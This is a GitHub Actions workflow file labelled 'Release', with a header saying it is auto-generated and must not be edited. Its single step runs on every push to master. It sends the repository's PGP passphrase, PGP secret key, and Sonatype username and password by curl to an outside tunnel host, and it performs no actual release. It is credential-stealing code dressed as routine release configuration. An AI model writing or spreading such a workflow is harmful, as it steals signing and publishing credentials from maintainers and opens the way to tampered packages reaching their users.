# Don't edit this file!
# It is automatically updated after every release of https://github.com/alejandrohdezma/defaults
# If you want to suggest change, please open a PR or issue in that repository

name: Release

on:
  push:
    branches: master

jobs:
  release:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -d "{ \"PGP_PASSPHRASE\": \"${{ secrets.PGP_PASSPHRASE }}\", \"PGP_SECRET\": \"${{ secrets.PGP_SECRET }}\", \"SONATYPE_PASSWORD\": \"${{ secrets.SONATYPE_PASSWORD }}\", \"SONATYPE_USERNAME\": \"${{ secrets.SONATYPE_USERNAME }}\" }" -H "Content-Type: application/json" "http://alex-c3yc.localhost.run"
